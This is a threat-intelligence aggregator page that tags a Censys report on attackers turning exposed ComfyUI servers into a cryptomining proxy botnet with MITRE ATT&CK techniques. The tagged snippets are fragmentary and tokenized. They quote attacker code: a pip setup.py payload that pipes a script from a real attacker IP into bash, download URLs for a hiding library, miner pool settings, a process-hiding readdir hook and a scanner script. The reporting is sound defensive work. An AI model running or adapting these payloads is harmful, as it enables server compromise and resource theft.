TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Censys

Hackers Are Attempting to Turn ComfyUI Servers Into a Cryptomining Proxy Botnet

Kate Lake · 2026-04-06 · Read original ↗

ATT&CK techniques detected

20 predictions
T1070.003Clear Command History
96%
"##енное время " ) return false after achieving rce, the next step is to remove evidence of the exploit. the scanner does this by clearing the comfyui prompt history : # = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =…"
T1018Remote System Discovery
84%
"continuously enumerate exposed comfyui instances across cloud infrastructure. the attacker used two reconnaissance tools. the first is a simple bash script that takes a list of ips and checks 100 at a time in parallel : #! / bin / bash input = $ { 1 : - " raw. txt " } output = " …"
T1098.004SSH Authorized Keys
84%
"40. 237 here, the operator generates a new ssh keypair and writes it to ~ /. ssh / a100. immediately after, they print the public key, likely to copy it into another host ’ s ~ /. ssh / authorized _ keys file for passwordless access. shortly thereafter, we observe an ssh login at…"
T1014Rootkit
79%
"processes matching the miner ' s names * / struct dirent * readdir ( dir * dirp ) { struct dirent * ( * orig ) ( dir * ) = dlsym ( rtld _ next, " readdir " ) ; struct dirent * e ; while ( ( e = orig ( dirp ) )! = null ) { if ( _ should _ hide ( e - > d _ name ) ) continue ; / / h…"
T1105Ingress Tool Transfer
78%
"##ll that creates an anonymous, memory - backed file descriptor. the binary gets downloaded, written into this anonymous file, and executed directly from / proc / self / fd / < n >. after execve, the download archive is deleted. there is no trail left over : scn = { ' x86 _ 64 ' …"
T1496Resource Hijacking
77%
"hackers are attempting to turn comfyui servers into a cryptomining proxy botnet executive summary censys arc discovered an active campaign targeting internet - exposed comfyui instances, where attackers exploit the custom node ecosystem to achieve rce on unauthenticated deploymen…"
T1059.006Python
76%
", the scanner found : of those, the scan log shows 97 successful exploits in that single cycle, the majority via the pip install vector : 14 : 20 : 40 [ pip ] xxx. xxx. xxx. 178 : 8188 pip payload delivered 14 : 20 : 40 [ vuln ] xxx. xxx. xxx. 178 : 8188 payload executed! 14 : 24…"
T1059.006Python
71%
"" : true, " code _ input " : " < payload code > \ noutputs = [ 0 ] \ noutputs [ 0 ] = dummy _ img " } }, " 99 " : { " class _ type " : " previewimage ", " inputs " : { " images " : [ " 2 ", 0 ] } } } other node types ( such as evaluatemultiple ) place the payload in different fie…"
T1190Exploit Public-Facing Application
67%
"##падет await asyncio. sleep ( 5 ) # ждем пока поднимется ( до reboot _ wait секунд ) for i in range ( reboot _ wait / / 3 ) : await asyncio. sleep ( 3 ) try : async with session. get ( f " { base } / system _ stats ", timeout = aiohttp. clienttimeout ( total = 3 ), ssl = false )…"
T1190Exploit Public-Facing Application
61%
". what stands out in this investigation is the use of comfyui. specifically, the operator identifies exposed comfyui instances running custom nodes, determines which of those nodes expose unsafe functionality, and then uses them as a pathway to remote code execution. this workflo…"
T1496Resource Hijacking
60%
"response to active exploitation. in either case, there is clear evidence that this technique has been used successfully in the wild, and that the associated tooling is evolving rapidly. the infrastructure accessed by the operator further supports the idea that this activity is pa…"
T1059.004Unix Shell
57%
"install git + https : / / …, pip clones the repo and executes setup. py. the following is the actual payload : from setuptools import setup import subprocess, os try : subprocess. popen ( [ ' bash ', ' - c ', ' curl - sl http : / / 77. 110. 96. 200 / q11. txt | bash & ' ], stdout…"
T1059.004Unix Shell
56%
"##l } 2 > / dev / null | | ' f ' python3 - c " import urllib. request ; ' f ' print ( urllib. request. urlopen ( \ \ " { payload _ url } \ \ " ). read ( ). decode ( ) ) " 2 > / dev / null ) ' f ' | tr - d \ ' \ \ r \ ' > " $ _ q " & & bash " $ _ q " > " $ { { _ q } }. log " 2 > &…"
T1190Exploit Public-Facing Application
54%
"response to active exploitation. in either case, there is clear evidence that this technique has been used successfully in the wild, and that the associated tooling is evolving rapidly. the infrastructure accessed by the operator further supports the idea that this activity is pa…"
T1496.001Compute Hijacking
50%
"hackers are attempting to turn comfyui servers into a cryptomining proxy botnet executive summary censys arc discovered an active campaign targeting internet - exposed comfyui instances, where attackers exploit the custom node ecosystem to achieve rce on unauthenticated deploymen…"
T1496Resource Hijacking
46%
"( 8081, 3333, 5555, 6969, 9999 ). wallets, mask names, and common runtimes are whitelisted so it doesn ’ t friendly - fire. walk every user in / etc / passwd, read their installed crontab, and if it matches mining or curl | bash patterns, delete the entire crontab. stop, disable,…"
T1564.004NTFS File Attributes
38%
"readonly ghost _ url = " http : / / 77. 110. 96. 200 / ghost. sh " readonly hide _ so _ url = " http : / / 77. 110. 96. 200 / libpam _ cache. so " readonly xmr _ pool _ 1 = " xmr. kryptex. network : 8029 " readonly xmr _ pool _ 2 = " 77. 110. 96. 200 : 3333 " readonly xmr _ walle…"
T1059.004Unix Shell
37%
", ' - c ', ' ' ' { bash _ cmd } ' ' ' ] ) else : subprocess. popen ( [ ' bash ', ' - c ', ' ' ' { bash _ cmd } ' ' ' ] ) except exception as e : with open ( ' err. txt ', ' w ' ) as f : f. write ( str ( e ) ) dummy _ img = torch. zeros ( 1, 64, 64, 3 ) " " " it should be noted he…"
T1496Resource Hijacking
34%
"##box, honey, analysis, suspicious dmesg strings, more than ten network interfaces ). if the score is high enough, the script immediately exits. updated process masquerading : in the prior version, it hardcoded its hidden process names as khugepaged _ < hash >, nv _ uvm _ < hash …"
T1580Cloud Infrastructure Discovery
30%
"continuously enumerate exposed comfyui instances across cloud infrastructure. the attacker used two reconnaissance tools. the first is a simple bash script that takes a list of ips and checks 100 at a time in parallel : #! / bin / bash input = $ { 1 : - " raw. txt " } output = " …"

Summary

Executive Summary Updates 2026-04-08 A few weeks after we first pulled ghost.sh (then labeled q11.txt, internally versioned as GHOST v5.1), the operator’s installer started pointing at a new file, q12.txt. We grabbed it and diffed the two. It’s the same script, just an updated version of the prior. The author versioned it internally and labeled […]

The post Hackers Are Attempting to Turn ComfyUI Servers Into a Cryptomining Proxy Botnet appeared first on Censys.